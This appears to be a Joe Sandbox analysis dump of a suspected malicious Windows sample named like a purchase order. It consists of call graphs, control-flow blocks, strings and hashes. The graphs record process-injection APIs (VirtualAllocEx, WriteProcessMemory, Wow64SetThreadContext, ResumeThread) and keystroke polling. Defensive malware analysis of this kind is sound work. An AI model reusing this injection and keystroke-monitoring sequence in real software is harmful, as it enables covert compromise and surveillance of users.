710c3d0 ResumeThread 77130->77131 77133 710c401 77131->77133 77135 710c8bd Wow64SetThreadContext 77134->77135 77137 710c905 77135->77137 77137->77055 77139 710cf4b ReadProcessMemory 77138->77139 77141 710cf8f 77139->77141 77141->77055 77143 710c990 VirtualAllocEx 77142->77143 77145 710c9cd 77143->77145 77145->77044 77146 710ca10 77145->77146 77147 710ca58 WriteProcessMemory 77146->77147 77149 710caaf 77147->77149 77640 c4667a8 KiUserCallbackDispatcher 77641 c46681c 77640->77641 77150 b882ab8 77151 b882acc 77150->77151 77152 b882add 77151->77152 77156 751d4a8 77151->77156 77162 751d498 77151->77162 77153 b882b00 77157 751d4ee 77156->77157 77158 751d511 77157->77158 77168 2b642b0 77157->77168 77174 2b60bcf 77157->77174 77182 2b60bfc 77157->77182 77158->77153 77163 751d4ee 77162->77163 77164 751d511 77163->77164 77165 2b642b0 11 API calls 77163->77165 77166 2b60bcf 11 API calls 77163->77166 77167 2b60bfc 11 API calls 77163->77167 77164->77153 77165->77164 77166->77164 77167->77164 77169 2b64302 77168->77169 77170 2b643ac 77168->77170 77172 2b6435a CallWindowProcW 77169->77172 77173 2b64309 77169->77173 77189 2b60ad4 77170->77189 77172->77173 77173->77158 77175 2b60bfd 77174->77175 77176 2b60b9c 77175->77176 77177 2b64302 77175->77177 77178 2b643ac 77175->77178 77180 2b6435a CallWindowProcW 77177->77180 77181 2b64309 77177->77181 77179 2b60ad4 10 API calls 77178->77179 77179->77181 77180->77181 77181->77158 77183 2b60c07 77182->77183 77184 2b64302 77183->77184 77185 2b643ac 77183->77185 77187 2b6435a CallWindowProcW 77184->77187 77188 2b64309 77184->77188 77186 2b60ad4 10 API calls 77185->77186 77186->77188 77187->77188 77188->77158 77190 2b60adf 77189->77190 77191 2b62c79 77190->77191 77193 2b62c69 77190->77193 77192 2b60bfc 11 API calls 77191->77192 77194 2b62c77 77192->77194 77198 2b62da0 77193->77198 77203 2b62d91 77193->77203 77208 2b62e6c 77193->77208 77200 2b62db4 77198->77200 77199 2b62e40 77199->77194 77214 2b62e58 77200->77214 77226 2b62e48 77200->77226 77205 2b62db4 77203->77205 77204 2b62e40 77204->77194 77206 2b62e58 11 API calls 77205->77206 77207 2b62e48 11 API calls 77205->77207 77206->77204 77207->77204 77209 2b62e7a 77208->77209 77210 2b62e2a 77208->77210 77212 2b62e58 11 API calls 77210->77212 77213 2b62e48 11 API calls 77210->77213 77211 2b62e40 77211->77194 77212->77211 77213->77211 77215 2b62e69 77214->77215 77238 751cf10 77214->77238 77265 2b63688 77214->77265 77276 2b63679 77214->77276 77287 7513278 77214->77287 77293 7513288 77214->77293 77300 7512fa0 77214->77300 77304 2b64280 77214->77304 77307 751cef0 77214->77307 77334 7512fb0 77214->77334 77338 710fea0 77214->77338 77215->77199 77227 710fea0 11 API calls 77226->77227 77228 751cf10 11 API calls 77226->77228 77229 751cef0 11 API calls 77226->77229 77230 7512fb0 11 API calls 77226->77230 77231 7512fa0 11 API calls 77226->77231 77232 2b64280 11 API calls 77226->77232 77233 7513278 11 API calls 77226->77233 77234 7513288 11 API calls 77226->77234 77235 2b62e69 77226->77235 77236 2b63688 11 API calls 77226->77236 77237 2b63679 11 API calls 77226->77237 77227->77235 77228->77235 77229->77235 77230->77235 77231->77235 77232->77235 77233->77235 77234->77235 77235->77199 77236->77235 77237->77235 77239 751cf29 77238->77239 77247 751cfc0 77238->77247 77240 751cf70 77239->77240 77241 751cf33 77239->77241 77242 751cf4a 77239->77242 77243 751cf3c 77240->77243 77251 751d247 77240->77251 77257 751d208 77240->77257 77258 751d229 77240->77258 77259 751d0bd 77240->77259 77264 751d076 77240->77264 77241->77243 77244 751d159 77241->77244 77245 751d0d0 77242->77245 77246 751cf53 77242->77246 77254 7513020 11 API calls 77243->77254 77243->77259 77358 751b430 77244->77358 77354 751b3e0 77245->77354 77246->77243 77248 751cf62 77246->77248 77246->77251 77252 751d167 77246->77252 77246->77257 77246->77258 77246->77259 77246->77264 77247->77243 77247->77251 77247->77257 77247->77258 77248->77243 77253 751d1ec 77248->77253 77255 7513020 11 API calls 77251->77255 77262 7513020 11 API calls 77252->77262 77362 751cb1c 11 API calls 77253->77362 77254->77259 77255->77259 77260 7513020 11 API calls 77257->77260 77261 7513020 11 API calls 77258->77261 77259->77215 77260->77259 77261->77259 77262->77259 77344 7513020 77264->77344 77266 2b636d4 77265->77266 77267 2b63974 77266->77267 77268 2b63fb4 GetKeyState 77266->77268 77273 2b64082 77266->77273 77267->77215 77269 2b63fe0 GetKeyState 77268->77269 77271 2b64033 GetFocus 77269->77271 77271->77273 77273->77267 77274 751d498 8 API calls 77273->77274 77275 751d4a8 8 API calls 77273->77275 77274->77267 77275->77267 77277 2b63688 77276->77277 77278 2b63974 77277->77278 77279 2b63fb4 GetKeyState 77277->77279 77284 2b64082 77277->77284 77278->77215 77280 2b63fe0 GetKeyState 77279->77280 77282 2b64033 GetFocus 77280->77282 77282->77284 77284->77278 77285 751d498 8 API calls 77284->77285 77286 751d4a8 8 API calls 77284->77286 77285->77278 77286->77278 77288 7513288 77287->77288 77289 75132aa 77288->77289 77290 2b64280 11 API calls 77288->77290 77291 2b63688 11 API calls 77288->77291 77292 2b63679 11 API calls 77288->77292 77289->77215 77290->77289 77291->77289 77292->77289 77294 7513309 77293->77294 77296 75132aa 77293->77296 77295 7513310 77294->77295 77297 2b64280 11 API calls 77294->77297 77298 2b63688 11 API calls 77294->77298 77299 2b63679 11 API calls 77294->77299 77295->77215 77296->77215 77297->77295 77298->77295 77299->77295 77301 7512fad 77300->77301 77302 7512fc9 77301->77302 77303 7513020 11 API calls 77301->77303 77302->77215 77303->77302 77305 2b60bfc 11 API calls 77304->77305 77306 2b642aa 77305->77306 77306->77215 77308 751cef5 77307->77308 77309 751cfc0 77308->77309 77310 751cf70 77308->77310 77311 751cf33 77308->77311 77312 751cf4a 77308->77312 77314 751cf3c 77309->77314 77320 751d247 77309->77320 77321 751d229 77309->77321 77322 751d208 77309->77322 77310->77314 77310->77320 77310->77321 77310->77322 77328 751d0bd 77310->77328 77333 751d076 77310->77333 77313 751d159 77311->77313 77311->77314 77315 751d0d0 77312->77315 77316 751cf53 77312->77316 77318 751b430 11 API calls 77313->77318 77325 7513020 11 API calls 77314->77325 77314->77328 77319 751b3e0 2 API calls 77315->77319 77316->77314 77317 751cf62 77316->77317 77316->77320 77316->77321 77316->77322 77323 751d167 77316->77323 77316->77328 77316->77333 77317->77314 77324 751d1ec 77317->77324 77318->77328 77319->77328 77326 7513020 11 API calls 77320->77326 77330 7513020 11 API calls 77321->77330 77329 7513020 11 API calls 77322->77329 77331 7513020 11 API calls 77323->77331 77419 751cb1c 11 API calls 77324->77419 77325->77328 77326->77328 77328->77215 77329->77328 77330->77328 77331->77328 77332 7513020 11 API calls 77332->77328 77333->77332 77335 7512fbf 77334->77335 77336 7512fc9 77334->77336 77337 7513020 11 API calls 77335->77337 77336->77215 77337->77336 77339 710fee0 77338->77339 77340 710feae 77338->77340 77339->77215 77341 710feb5 77340->77341 77420 c460040 77340->77420 77426 c460006 77340->77426 77341->77215 77345 7513032 77344->77345 77346 751302b 77344->77346 77389 751304f 77345->77389 77396 7513040 77345->77396 77402 7513050 77345->77402 77363 751f580 77346->77363 77376 751f510 77346->77376 77347 7513030 77347->77259 77348 7513038 77348->77259 77355 751b3eb 77354->77355 77415 751cc98 77355->77415 77357 751e512 77357->77259 77359 751b43b 77358->77359 77360 7513020 11 API calls 77359->77360 77361 751d61e 77360->77361 77361->77259 77362->77259 77364 751f5ab 77363->77364 77365 751f6b5 77364->77365 77366 751f5bb 77364->77366 77367 7513050 11 API calls 77365->77367 77369 751f5c7 77366->77369 77374 751f603 77366->77374 77368 751f6c0 77367->77368 77368->77347 77409 751cce8 77369->77409 77370 7513050 11 API calls 77371 751f6ae 77370->77371 77371->77347 77373 751f5fc 77373->77347 77374->77370 77375 751f693 77374->77375 77375->77347 77377 751f580 77376->77377 77378 751f6b5 77377->77378 77379 751f5bb 77377->77379 77380 7513050 11 API calls 77378->77380 77384 751f5c7 77379->77384 77387 751f603 77379->77387 77381 751f6c0 77380->77381 77381->77347 77382 7513050 11 API calls 77383 751f6ae 77382->77383 77383->77347 77385 751cce8 2 API calls 77384->77385 77386 751f5fc 77385->77386 77386->77347 77387->77382 77388 751f693 77387->77388 77388->77347 77390 751305e 77389->77390 77392 7513080 77389->77392 77391 751306c 77390->77391 77393 2b63679 11 API calls 77390->77393 77394 2b64280 11 API calls 77390->77394 77395 2b63688 11 API calls 77390->77395 77391->77348 77392->77348 77393->77391 77394->77391 77395->77391 77397 7513050 77396->77397 77398 751306c 77397->77398 77399 2b63679 11 API calls 77397->77399 77400 2b64280 11 API calls 77397->77400 77401 2b63688 11 API calls 77397->77401 77398->77348 77399->77398 77400->77398 77401->77398 77403 751305e 77402->77403 77405 7513080 77402->77405 77404 751306c 77403->77404 77406 2b63679 11 API calls 77403->77406 77407 2b64280 11 API calls 77403->77407 77408 2b63688 11 API calls 77403->77408 77404->77348 77405->77348 77406->77404 77407->77404 77408->77404 77410 751ccf3 77409->77410 77411 751ef91 GetFocus 77410->77411 77414 751effe 77410->77414 77412 751efb9 77411->77412 77413 751effc KiUserCallbackDispatcher 77412->77413 77412->77414 77413->77414 77414->77373 77416 751cca3 77415->77416 77417 751e59e 77416->77417 77418 751cce8 2 API calls 77416->77418 77417->77357 77418->77417 77419->77328 77421 c46009b 77420->77421 77422 c460066 77420->77422 77421->77422 77423 2b64280 11 API calls 77421->77423 77424 2b63688 11 API calls 77421->77424 77425 2b63679 11 API calls 77421->77425 77422->77341 77423->77422 77424->77422 77425->77422 77427 c460066 77426->77427 77428 c46009b 77426->77428 77427->77341 77428->77427 77429 2b64280 11 API calls 77428->77429 77430 2b63688 11 API calls 77428->77430 77431 2b63679 11 API calls 77428->77431 77429->77427 77430->77427 77431->77427 77642 b883978 77654 b883230 GetKeyState 77642->77654 77644 b8839a6 77646 b883230 5 API calls 77644->77646 77648 b8839bb 77644->77648 77647 b8839e9 77646->77647 77649 b8839ed 77647->77649 77650 b883230 5 API calls 77647->77650 77651 b883a0e 77650->77651 77656 b883290 GetKeyState 77654->77656 77657 b8832d5 GetKeyState 77656->77657 77659 b88331a GetKeyState 77657->77659 77662 b88335f GetKeyState 77659->77662 77663 b8833a4 77662->77663 77663->77644 77664 b883a69 77663->77664 77668 b883a78 77663->77668 77665 b883a86 77664->77665 77666 b883a91 KiUserCallbackDispatcher 77665->77666 77667 b883a9a 77665->77667 77666->77667 77667->77644 77669 b883a86 77668->77669 77670 b883a91 KiUserCallbackDispatcher 77669->77670 77671 b883a9a 77669->77671 77670->77671 77671->77644 77672 b889ff8 77673 b88a01e 77672->77673 77674 b88a183 77672->77674 77673->77674 77675 751db10 PostMessageW 77673->77675 77676 751db18 PostMessageW 77673->77676 77675->77673 77676->77673 77432 7513be0 77434 7513c07 77432->77434 77433 7513d0c 77434->77433 77435 7513c68 77434->77435 77437 f9cac4 8 API calls 77434->77437 77440 f9f578 77434->77440 77435->77433 77444 c4612c8 77435->77444 77448 c4612b7 77435->77448 77437->77435 77441 f9f588 77440->77441 77442 f9dde8 8 API calls 77441->77442 77443 f9f5af 77442->77443 77443->77435 77445 c4612f2 77444->77445 77452 70217df 77445->77452 77449 c4612f2 77448->77449 77451 70217df 8 API calls 77449->77451 77450 c461314 77450->77433 77451->77450 77454 7021804 77452->77454 77453 7021834 77453->77433 77457 f9eb10 77454->77457 77461 f9eaff 77454->77461 77458 f9eb2d 77457->77458 77459 f9cac4 8 API calls 77458->77459 77460 f9eb71 77458->77460 77459->77460 77460->77453 77462 f9eb2d 77461->77462 77463 f9cac4 8 API calls 77462->77463 77464 f9eb71 77462->77464 77463->77464 77464->77453 77465 75130e0 77466 7513122 77465->77466 77467 7513128 SetWindowTextW 77465->77467 77466->77467 77468 7513159 77467->77468 77469 f9f74d 77470 f9f758 77469->77470 77471 c460472 2 API calls 77469->77471 77472 c460480 2 API calls 77469->77472 77471->77470 77472->77470 77473 2b6a180 77477 2b6a1a8 77473->77477 77482 2b6a199 77473->77482 77474 2b6a196 77479 2b6a1d1 77477->77479 77478 2b6a2d6 77478->77474 77479->77478 77487 2b6a651 77479->77487 77492 2b6a660 77479->77492 77484 2b6a1d1 77482->77484 77483 2b6a2d6 77483->77474 77484->77483 77485 2b6a660 9 API calls 77484->77485 77486 2b6a651 9 API calls 77484->77486 77485->77483 77486->77483 77489 2b6a684 77487->77489 77488 2b6a75a 77488->77478 77489->77488 77497 2b6ac78 77489->77497 77502 2b6ac88 77489->77502 77494 2b6a684 77492->77494 77493 2b6a75a 77493->77478 77494->77493 77495 2b6ac88 9 API calls 77494->77495 77496 2b6ac78 9 API calls 77494->77496 77495->77493 77496->77493 77498 2b6aca3 77497->77498 77507 2b6ae53 77497->77507 77511 2b6acb8 77497->77511 77515 2b6aca9 77497->77515 77498->77488 77503 2b6aca3 77502->77503 77504 2b6ae53 9 API calls 77502->77504 77505 2b6acb8 9 API calls 77502->77505 77506 2b6aca9 9 API calls 77502->77506 77503->77488 77504->77503 77505->77503 77506->77503 77508 2b6ae19 77507->77508 77510 2b6bdc0 9 API calls 77508->77510 77509 2b6ae40 77509->77498 77510->77509 77513 2b6acf2 77511->77513 77512 2b6ae40 77512->77498 77514 2b6bdc0 9 API calls 77513->77514 77514->77512 77517 2b6acf2 77515->77517 77516 2b6ae40 77516->77498 77518 2b6bdc0 9 API calls 77517->77518 77518->77516 77677 2b6fec0 77678 2b6fee3 77677->77678 77680 7513020 11 API calls 77678->77680 77679 2b6feec 77680->77679 77681 b886770 77682 b886784 77681->77682 77683 b886856 77682->77683 77686 b886d09 77682->77686 77690 b886d18 77682->77690 77687 b886d12 77686->77687 77689 b886d25 77686->77689 77693 b886920 77687->77693 77689->77683 77691 b886920 8 API calls 77690->77691 77692 b886d25 77690->77692 77691->77692 77692->77683 77694 b886942 77693->77694 77698 2b66268 77694->77698 77702 2b66278 77694->77702 77695 b8869a0 77695->77689 77699 2b66278 77698->77699 77700 2b645a0 8 API calls 77699->77700 77701 2b662ab 77699->77701 77700->77701 77701->77695 77703 2b66295 77702->77703 77705 2b662ab 77702->77705 77704 2b645a0 8 API calls 77703->77704 77703->77705 77704->77705 77705->77695 77706 751c228 77707 751c276 EnumThreadWindows 77706->77707 77708 751c26c 77706->77708 77709 751c2a8 77707->77709 77708->77707 77710 2b676c8 77711 2b676e0 77710->77711 77732 2b6740c 77711->77732 77713 2b67739 77740 2b6741c 77713->77740 77715 2b6775d 77744 2b6742c 77715->77744 77717 2b6777b 77718 2b6814b 77717->77718 77722 2b67b18 77717->77722 77729 f95c7c 15 API calls 77718->77729 77730 f98430 15 API calls 77718->77730 77731 f98742 15 API calls 77718->77731 77719 2b681e6 77720 2b675fc 9 API calls 77719->77720 77721 2b68211 77720->77721 77725 7020d30 GetCurrentThreadId 77722->77725 77726 7020d21 GetCurrentThreadId 77722->77726 77723 2b67ffd 77727 7020d30 GetCurrentThreadId 77723->77727 77728 7020d21 GetCurrentThreadId 77723->77728 77724 2b68014 77725->77723 77726->77723 77727->77724 77728->77724 77729->77719 77730->77719 77731->77719 77733 2b67417 77732->77733 77737 f95c7c 15 API calls 77733->77737 77738 f98430 15 API calls 77733->77738 77739 f98742 15 API calls 77733->77739 77734 2b681e6 77735 2b675fc 9 API calls 77734->77735 77736 2b68211 77735->77736 77736->77713 77737->77734 77738->77734 77739->77734 77741 2b67427 77740->77741 77743 2b6862e 77741->77743 77748 2b6763c 77741->77748 77743->77715 77745 2b67437 77744->77745 77746 2b6763c 15 API calls 77745->77746 77747 2b6868e 77746->77747 77747->77717 77749 2b67647 77748->77749 77750 f95c4c 15 API calls 77749->77750 77753 f97250 77749->77753 77752 2b68c84 77750->77752 77752->77743 77754 f97260 77753->77754 77755 f95c7c 15 API calls 77754->77755 77756 f97305 77755->77756 77756->77752

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ($($($)$)$)$)$)$.$4'^q
                                                                                                                                              • API String ID: 0-3513660345
                                                                                                                                              • Opcode ID: 2eb8c22527562f9e4db9c8aa4e0355ad9b229cc4e5c992398ff7e29a48a50744
                                                                                                                                              • Instruction ID: 350f91aa56a8589667b1f1b85354be2cf249d8e31e09f6bc9ea5ad11e79eb545
                                                                                                                                              • Opcode Fuzzy Hash: 2eb8c22527562f9e4db9c8aa4e0355ad9b229cc4e5c992398ff7e29a48a50744
                                                                                                                                              • Instruction Fuzzy Hash: A6621A30A10704CFCB05EF74C898BA9B7B2EF89304F1586A9D9096F365DF75A985CB90

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 505 2b676b8-2b67726 513 2b67730-2b67734 call 2b6740c 505->513 515 2b67739-2b67768 call 2b6741c 513->515 521 2b67772-2b67776 call 2b6742c 515->521 523 2b6777b-2b6781c call 2b6743c * 5 521->523 545 2b67826-2b6782a call 2b6744c 523->545 547 2b6782f-2b67847 545->547 550 2b6784e-2b6785b 547->550 551 2b67861-2b67889 call 2b6745c 550->551 554 2b6788e-2b678a7 call 2b6746c 551->554 557 2b678ac-2b679a6 call 2b6747c call 2b6748c call 2b6749c call 2b674ac call 2b674bc 554->557 570 2b679ab-2b679ca call 2b674cc 557->570 573 2b679cf-2b67a2c call 2b674dc 570->573 581 2b67a37-2b67a3e 573->581 582 2b67a4a-2b67ad1 581->582 590 2b67ad8-2b67af2 582->590 591 2b67af8-2b67afa 590->591 592 2b67b04-2b67b08 591->592 593 2b67b0e-2b67b12 592->593 594 2b6814b-2b681d2 593->594 595 2b67b18-2b67bdd call 2b674ec 593->595 601 2b681da-2b681dc 594->601 616 2b67be7-2b67c20 call 2b6747c 595->616 709 2b681e1 call f95c7c 601->709 710 2b681e1 call f98430 601->710 711 2b681e1 call f98742 601->711 603 2b681e6-2b68223 call 2b675fc call 2b6760c 619 2b67c25-2b67cd9 call 2b6749c call 2b674fc call 2b674ac call 2b6750c call 2b674bc 616->619 630 2b67cde-2b67cec 619->630 631 2b67cf1-2b67f0a call 2b6751c * 5 call 2b6752c call 2b6753c call 2b6751c 630->631 658 2b67f0f-2b67f4a 631->658 659 2b67f50-2b67f87 call 2b6754c 658->659 662 2b67f8c-2b67fe1 call 2b6755c call 2b6756c 659->662 666 2b67fe6-2b67fe8 call 2b6757c 662->666 668 2b67fed-2b67ff7 666->668 705 2b67ffa call 7020d30 668->705 706 2b67ffa call 7020d21 668->706 669 2b67ffd-2b67fff call 2b6757c 671 2b68004-2b6800e 669->671 707 2b68011 call 7020d30 671->707 708 2b68011 call 7020d21 671->708 672 2b68014-2b6801b call 2b6758c 674 2b68020-2b68036 672->674 676 2b6804e-2b68110 call 2b6759c call 2b675ac call 2b675bc call 2b675cc call 2b675dc call 2b6749c call 2b6577c 674->676 677 2b68038-2b6803e 674->677 698 2b68117-2b6811f 676->698 678 2b68042-2b68044 677->678 679 2b68040 677->679 678->676 679->676 712 2b68121 call 2b6c207 698->712 713 2b68121 call 2b6c218 698->713 699 2b68126-2b68135 call 2b675ec 714 2b68137 call 2b6c207 699->714 715 2b68137 call 2b6c218 699->715 702 2b6813c-2b6813e call 2b675ec 704 2b68143-2b6814a 702->704 705->669 706->669 707->672 708->672 709->603 710->603 711->603 712->699 713->699 714->702 715->702
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ($($($)$)$)$)$)$.$4'^q
                                                                                                                                              • API String ID: 0-3513660345
                                                                                                                                              • Opcode ID: 9168fde8b7e6ee3cd96338383b28e7e6b84e19ab62e3f6248279ad4badbeb999
                                                                                                                                              • Instruction ID: 6e49129ac65a925f8bbf97699a6a030c0231db008d75f3cfd8e431eb766dff2b
                                                                                                                                              • Opcode Fuzzy Hash: 9168fde8b7e6ee3cd96338383b28e7e6b84e19ab62e3f6248279ad4badbeb999
                                                                                                                                              • Instruction Fuzzy Hash: 4D520630A10704CFCB04EF74C998AA9B7B2EF89304F1586A9D9096F365DF75A985CF90

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 716 751a708-751a76d 717 751a773-751a780 716->717 718 751ac55-751acbe call 7512990 716->718 721 751acc5-751ad1c call 7512990 717->721 722 751a786-751a790 717->722 718->721 727 751ad23-751ad7a call 7512990 721->727 722->727 728 751a796-751a7a0 722->728 730 751ad81-751add8 call 7512990 727->730 728->730 731 751a7a6-751a7b0 728->731 735 751addf-751ae3c call 7512990 730->735 734 751a7b6-751a7bd 731->734 731->735 742 751ae43-751aeb1 call 7512b18 734->742 743 751a7c3-751a7c7 734->743 735->742 809 751aeb3-751aeb7 742->809 810 751aeb9-751aebb 742->810 747 751a7c9-751a7fe 743->747 748 751a81e-751a872 call 7519350 call 7519360 GetCapture 743->748 747->748 775 751a800-751a80f 747->775 772 751a874-751a87a 748->772 773 751a87b-751a889 748->773 772->773 779 751a8b5-751a8ea GetActiveWindow 773->779 780 751a88b-751a8b0 call 7513368 call 7519370 773->780 775->748 793 751a811-751a81b call 7519340 775->793 788 751a8f3-751a904 779->788 789 751a8ec-751a8f2 779->789 780->779 796 751a913 788->796 797 751a906-751a911 788->797 789->788 793->748 798 751a916-751a948 796->798 797->798 815 751a94a-751a950 798->815 816 751a95d-751a980 798->816 811 751aec0-751aece 809->811 810->811 815->816 817 751a952-751a958 call 751937c 815->817 821 751a986-751a990 816->821 822 751aa48-751aa52 816->822 817->816 821->822 827 751a996-751a9c9 821->827 823 751aa54-751aa57 call 751af21 822->823 824 751aa5d-751aa80 822->824 823->824 830 751aa82-751aa85 824->830 831 751aa88-751aa96 824->831 834 751ab9b-751ac2a call 7512990 call 751937c 827->834 835 751a9cf-751aa3e 827->835 830->831 836 751aa98-751aaa6 831->836 837 751aacc-751aada 831->837 834->718 835->822 836->837 842 751aaa8-751aaca call 751938c 836->842 843 751aaf8-751aaff 837->843 844 751aadc-751aaea 837->844 842->843 883 751ab05 call 751fc98 843->883 884 751ab05 call 751fc88 843->884 844->843 852 751aaec-751aaf3 call 751938c 844->852 850 751ab08-751ab18 856 751ab1a-751ab24 850->856 857 751ab6d-751ab7c 850->857 852->843 863 751ab62-751ab67 856->863 864 751ab26-751ab39 call 7519398 856->864 857->834 879 751ab6a call b88619c 863->879 880 751ab6a call b885f20 863->880 881 751ab6a call b885ef0 863->881 864->863 871 751ab3b-751ab5b 864->871 871->863 879->857 880->857 881->857 883->850 884->850
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ActiveCaptureWindow
                                                                                                                                              • String ID: Hbq$Hbq
                                                                                                                                              • API String ID: 2424615356-4258043069
                                                                                                                                              • Opcode ID: 7f2450a732ba9e71c0d0e541cd1b6bb07860d7b0c5e03df451d2a2930bf09491
                                                                                                                                              • Instruction ID: aea6180632e7c18e6dc4766de19bcd4d1ae07bca2a4bbe9e3bbef55f68bd2441
                                                                                                                                              • Opcode Fuzzy Hash: 7f2450a732ba9e71c0d0e541cd1b6bb07860d7b0c5e03df451d2a2930bf09491
                                                                                                                                              • Instruction Fuzzy Hash: E0227D70B002098FEB25EBB9C5546AEBBF2BFC8300F248569D109AB395DF349D42DB51

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 885 70203c8-7022760 888 7022c43-7022cac 885->888 889 7022766-702276b 885->889 895 7022cb3-7022d3b 888->895 889->888 890 7022771-702278e 889->890 890->895 896 7022794-7022798 890->896 941 7022d46-7022dc6 895->941 898 70227a7-70227ab 896->898 899 702279a-70227a4 call 70203d8 896->899 901 70227ba-70227c1 898->901 902 70227ad-70227b7 call 70203d8 898->902 899->898 907 70227c7-70227f7 901->907 908 70228dc-70228e1 901->908 902->901 918 7022fc6-7023046 907->918 921 70227fd-7022830 call 70203e4 907->921 911 70228e3-70228e7 908->911 912 70228e9-70228ee 908->912 911->912 914 70228f0-70228f4 911->914 915 7022900-7022930 call 70203f0 * 3 912->915 914->918 919 70228fa-70228fd 914->919 915->941 942 7022936-7022939 915->942 939 7023048-702304e 918->939 940 702304f-702306c 918->940 919->915 933 7022835-70228d0 call 70203e4 921->933 933->908 952 70228d2 933->952 939->940 960 7022dcd-7022e4f 941->960 942->941 945 702293f-7022941 942->945 945->941 947 7022947-702297c 945->947 959 7022982-702298b 947->959 947->960 952->908 962 7022991-70229eb call 70203f0 * 2 call 7020400 * 2 959->962 963 7022aee-7022af2 959->963 965 7022e57-7022ed9 960->965 1005 70229fd 962->1005 1006 70229ed-70229f6 962->1006 963->965 966 7022af8-7022afc 963->966 970 7022ee1-7022f0e 965->970 969 7022b02-7022b08 966->969 966->970 974 7022b0a 969->974 975 7022b0c-7022b41 969->975 984 7022f15-7022f95 970->984 979 7022b48-7022b4e 974->979 975->979 983 7022b54-7022b5c 979->983 979->984 988 7022b63-7022b65 983->988 989 7022b5e-7022b62 983->989 1039 7022f9c-7022fbe 984->1039 996 7022bc7-7022bcd 988->996 997 7022b67-7022b8b 988->997 989->988 1000 7022bcf-7022bea 996->1000 1001 7022bec-7022c1a 996->1001 1027 7022b94-7022b98 997->1027 1028 7022b8d-7022b92 997->1028 1020 7022c22-7022c2e 1000->1020 1001->1020 1011 7022a01-7022a03 1005->1011 1006->1011 1012 70229f8-70229fb 1006->1012 1018 7022a05 1011->1018 1019 7022a0a-7022a0e 1011->1019 1012->1011 1018->1019 1024 7022a10-7022a17 1019->1024 1025 7022a1c-7022a22 1019->1025 1038 7022c34-7022c40 1020->1038 1020->1039 1034 7022ab9-7022abd 1024->1034 1035 7022a24-7022a2a 1025->1035 1036 7022a2c-7022a31 1025->1036 1027->918 1031 7022b9e-7022ba1 1027->1031 1029 7022ba4-7022bb5 1028->1029 1077 7022bb7 call 7023100 1029->1077 1078 7022bb7 call 70230f0 1029->1078 1031->1029 1040 7022abf-7022ad9 1034->1040 1041 7022adc-7022ae8 1034->1041 1042 7022a37-7022a3d 1035->1042 1036->1042 1039->918 1040->1041 1041->962 1041->963 1045 7022a43-7022a48 1042->1045 1046 7022a3f-7022a41 1042->1046 1052 7022a4a-7022a5c 1045->1052 1046->1052 1048 7022bbd-7022bc5 1048->1020 1057 7022a66-7022a6b 1052->1057 1058 7022a5e-7022a64 1052->1058 1060 7022a71-7022a78 1057->1060 1058->1060 1064 7022a7a-7022a7c 1060->1064 1065 7022a7e 1060->1065 1068 7022a83-7022a8e 1064->1068 1065->1068 1070 7022ab2 1068->1070 1071 7022a90-7022a93 1068->1071 1070->1034 1071->1034 1072 7022a95-7022a9b 1071->1072 1073 7022aa2-7022aab 1072->1073 1074 7022a9d-7022aa0 1072->1074 1073->1034 1076 7022aad-7022ab0 1073->1076 1074->1070 1074->1073 1076->1034 1076->1070 1077->1048 1078->1048
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                              • API String ID: 0-1677660839
                                                                                                                                              • Opcode ID: f787799a486ac940d272cdb371b969fb6935e66ab35ef7c7cae2e2b26ca48a60
                                                                                                                                              • Instruction ID: cb1e06fd08da1f486cc11ba1f49ddb0c222bcbd6de0f8028f818846929dba58d
                                                                                                                                              • Opcode Fuzzy Hash: f787799a486ac940d272cdb371b969fb6935e66ab35ef7c7cae2e2b26ca48a60
                                                                                                                                              • Instruction Fuzzy Hash: 9D427071E002288FDB54DFB9C55079EBBF6BF88300F148669D409AB395DB349946CF91

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
